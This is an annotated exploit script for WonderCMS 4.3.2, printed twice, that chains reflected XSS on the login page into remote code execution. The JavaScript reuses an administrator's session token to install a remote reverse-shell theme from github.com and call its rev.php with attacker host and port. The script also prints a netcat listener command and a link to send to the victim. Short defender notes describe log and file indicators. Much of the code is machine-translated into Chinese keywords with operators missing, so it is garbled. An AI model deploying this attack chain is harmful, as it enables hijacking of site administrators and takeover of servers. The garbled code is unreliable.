# Author: ProfessionalMind
# Exploit: WonderCMS 4.3.2 XSS to RCE
#
# NOTE(review): this listing has been through machine translation. Python
# keywords and calls appear translated or re-cased (for example 导入 for
# import, 打印 for print, TRY / exceve for try / except), and several operators
# and quote characters are missing, so the text does not parse as shown. The
# comments below describe only what the visible lines establish.
#
# Overview: the script writes a JavaScript file (xss.js), prints a link meant
# for a logged-in WonderCMS administrator, and serves the file over HTTP. When
# the administrator's browser loads xss.js, the JavaScript reuses the
# administrator's session to install a remote theme archive and then requests a
# PHP file from that theme.
#
# Command-line values as used below:
#   sys.argv[1] - URL of the target's login page (the text 'loginurl' in it is
#                 replaced when the link is built)
#   sys.argv[2] - host that serves xss.js; also passed on as `lhost`
#   sys.argv[3] - port; passed on as `lport` and shown in the listener command
#
# Defender notes, grounded in the requests this script generates:
#   * Web logs: a GET carrying an `installModule=` query parameter that points
#     at an external archive, followed by requests to `/themes/<new dir>/rev.php`
#     with `lhost` / `lport` parameters.
#   * File system: a new directory under `themes/` containing PHP.
#   * The chain depends on (1) a login-page parameter reflected without output
#     encoding, (2) the module installer accepting an arbitrary archive URL with
#     only the session token, and (3) PHP execution inside `themes/`. Patching
#     the CMS, restricting installer sources, a script-src Content-Security-
#     Policy and disabling script execution in upload/theme directories each
#     break one link.

# Module imports. `requests` and `BS4` are not referenced anywhere in the
# visible code.
导入系统
导入请求
导入操作系统
导入BS4
# Argument-count guard: prints a usage line when the three required arguments
# are not supplied. The comparison operator between len(sys.argv) and 4, and the
# rest of the usage string, were lost in extraction.
if(len(sys.argv)4): print('用法: python3
其他:
# JavaScript template written to xss.js. The three command-line values are
# concatenated into the script text with str() only, with no escaping.
# What the JavaScript does once it runs in the administrator's browser:
#   1. Derives the site base path from the login URL (drops a trailing '/',
#      drops the last path segment, takes the URL's pathname).
#   2. Reads the value of the first element named `token` in the current page,
#      i.e. the token from the administrator's own session.
#   3. Sends a GET to `<base>/?installModule=...` naming a zip archive on
#      github.com as a theme and appending that token. `withCredentials = true`
#      makes the browser attach the administrator's cookies. (The separators
#      between the query parameters were lost in extraction.)
#   4. On HTTP 200, requests `<base>/themes/revshell-main/rev.php`, and on a
#      second HTTP 200 requests it again with `lhost` and `lport` set from
#      sys.argv[2] and sys.argv[3].
数据='''
var url=''''+str(sys.argv [1])+'''';
如果(url.endswith('/')){
url=url.slice(0,-1);
}
var urlwithoutlog=url.split('/')。切片(0,-1).join('/');
var urlWithOutLogBase=new URL(urlWithOutLog).pathName;
var token=document.queryselectorall('[name='token']')[0] .value;
var urlrev=urlwithoutlogbase +'/?installModule=3https://github.com/prodigiousmind/revshell/revshell/axtive/refs/heads/main.zipdirectoryname=vilettype=themesttype=themestoken=themestoken=' + soken;
var xhr3=new xmlhttprequest();
xhr3.withCredentials=true;
xhr3.open('get',urlrev);
xhr3.send();
xhr3.onload=function(){
如果(xhr3.status==200){
var xhr4=new xmlhttprequest();
xhr4.withCredentials=true;
xhr4.open('get',urlwithoutlogbase+'/themes/revshell-main/rev.php');
xhr4.send();
xhr4.onload=function(){
如果(xhr4.status==200){
var ip=''''+str(sys.argv [2])+'''';
var port=''''+str(sys.argv [3])+'''';
var Xhr5=new XMLHTTPRequest();
xhr5.withCredentials=true;
xhr5.open('get',urlwithoutlogbase +'/themes/revshell-main/rev.php?lhost=' + ip +'lport=' + port);
xhr5.send();
}
};
}
};
'''
# Operator-side steps: write the file, print instructions, serve the file.
TRY:
# Writes the template to xss.js in the current directory. The file object is
# never closed explicitly.
打开('xss.js','w')。写(数据)
print(创建'[+] XSS.JS')
# Prints the listener command (`nc -lvp` followed by sys.argv[3]) for the
# operator to run in a second terminal.
print('[+]在另一个终端\ n \ n ------------------------------------------- \ nnc -lvp'+str(sys.argv [3])中执行以下命令))
打印('----------------------------------- \ n')
# Builds the link sent to the administrator: the 'loginurl' part of sys.argv[1]
# is replaced with an `index.php?page=` value that appears to close the
# surrounding markup and add a script element loading from http://<sys.argv[2]>.
# NOTE(review): the injected markup is garbled here; the reflected `page`
# parameter is the injection point as far as the visible text shows.
XSSlink=str(sys.argv [1])。替换('loginurl','index.php?page=loginurl?')+'\'/formscript+src=\'http://'+str(sys.argv [2])
# As shown, strip('') removes nothing; presumably a space argument was lost.
xsslink=xsslink.strip('')
打印('将以下链接发送到Admin: \ n \ n ------------------------------------------ \ n'+XSSLink)
打印('----------------------------------- \ n')
打印('\ nstarting HTTP服务器允许访问XSS.JS')
# Serves the current directory (including xss.js) with Python's built-in HTTP
# server; this call blocks until the server is stopped.
OS.System('Python3 -m http.server \ n')
# Catch-all handler: on any failure above, the template is printed so it can be
# saved to a file by hand. The original error is discarded.
exceve:打印(数据,'\ n','//将其写入文件')
# Exploit: WonderCMS 4.3.2 XSS to RCE
#
# NOTE(review): this is a second copy of the same script on the page, with the
# same machine-translation damage: Python keywords appear translated or
# re-cased (导入 for import, 打印 for print, TRY / exceve for try / except) and
# some operators and quotes are missing, so the text does not parse as shown.
#
# Overview: writes a JavaScript file (xss.js), prints a link meant for a
# logged-in WonderCMS administrator, and serves the file over HTTP. The
# JavaScript reuses the administrator's browser session to install a remote
# theme archive and then requests a PHP file from that theme.
#
# Command-line values as used below:
#   sys.argv[1] - URL of the target's login page
#   sys.argv[2] - host that serves xss.js; also passed on as `lhost`
#   sys.argv[3] - port; passed on as `lport` and shown in the listener command
#
# Defender notes: look for a GET with an `installModule=` query parameter that
# names an external archive, a new directory under `themes/` containing PHP,
# and requests to `/themes/<new dir>/rev.php` carrying `lhost` / `lport`.
# Output-encoding the reflected login-page parameter, restricting installer
# sources, a script-src Content-Security-Policy and disabling script execution
# in theme directories each break one step of the chain.

# Module imports. `requests` and `BS4` are not referenced in the visible code.
导入系统
导入请求
导入操作系统
导入BS4
# Argument-count guard; the comparison operator and the rest of the usage
# string were lost in extraction.
if(len(sys.argv)4): print('用法: python3
其他:
# JavaScript template written to xss.js; the command-line values are
# concatenated in with str() only, with no escaping. In the administrator's
# browser it:
#   1. derives the site base path from the login URL;
#   2. reads the value of the first element named `token` on the page;
#   3. sends a credentialed GET to `<base>/?installModule=...` naming a zip
#      archive on github.com as a theme, with that token appended;
#   4. on HTTP 200 requests `<base>/themes/revshell-main/rev.php`, then requests
#      it again with `lhost` / `lport` from sys.argv[2] and sys.argv[3].
数据='''
var url=''''+str(sys.argv [1])+'''';
如果(url.endswith('/')){
url=url.slice(0,-1);
}
var urlwithoutlog=url.split('/')。切片(0,-1).join('/');
var urlWithOutLogBase=new URL(urlWithOutLog).pathName;
var token=document.queryselectorall('[name='token']')[0] .value;
var urlrev=urlwithoutlogbase +'/?installModule=3https://github.com/prodigiousmind/revshell/revshell/axtive/refs/heads/main.zipdirectoryname=vilettype=themesttype=themestoken=themestoken=' + soken;
var xhr3=new xmlhttprequest();
xhr3.withCredentials=true;
xhr3.open('get',urlrev);
xhr3.send();
xhr3.onload=function(){
如果(xhr3.status==200){
var xhr4=new xmlhttprequest();
xhr4.withCredentials=true;
xhr4.open('get',urlwithoutlogbase+'/themes/revshell-main/rev.php');
xhr4.send();
xhr4.onload=function(){
如果(xhr4.status==200){
var ip=''''+str(sys.argv [2])+'''';
var port=''''+str(sys.argv [3])+'''';
var Xhr5=new XMLHTTPRequest();
xhr5.withCredentials=true;
xhr5.open('get',urlwithoutlogbase +'/themes/revshell-main/rev.php?lhost=' + ip +'lport=' + port);
xhr5.send();
}
};
}
};
'''
# Operator-side steps: write the file, print instructions, serve the file.
TRY:
# Writes the template to xss.js in the current directory; the file object is
# never closed explicitly.
打开('xss.js','w')。写(数据)
print(创建'[+] XSS.JS')
# Prints the listener command (`nc -lvp` followed by sys.argv[3]).
print('[+]在另一个终端\ n \ n ------------------------------------------- \ nnc -lvp'+str(sys.argv [3])中执行以下命令))
打印('----------------------------------- \ n')
# Builds the link for the administrator by replacing 'loginurl' in sys.argv[1]
# with an `index.php?page=` value that appears to add a script element loading
# from http://<sys.argv[2]>. NOTE(review): the injected markup is garbled here.
XSSlink=str(sys.argv [1])。替换('loginurl','index.php?page=loginurl?')+'\'/formscript+src=\'http://'+str(sys.argv [2])
# As shown, strip('') removes nothing; presumably a space argument was lost.
xsslink=xsslink.strip('')
打印('将以下链接发送到Admin: \ n \ n ------------------------------------------ \ n'+XSSLink)
打印('----------------------------------- \ n')
打印('\ nstarting HTTP服务器允许访问XSS.JS')
# Serves the current directory (including xss.js) with Python's built-in HTTP
# server; this call blocks until the server is stopped.
OS.System('Python3 -m http.server \ n')
# Catch-all handler: on any failure above, the template is printed so it can be
# saved by hand. The original error is discarded.
exceve:打印(数据,'\ n','//将其写入文件')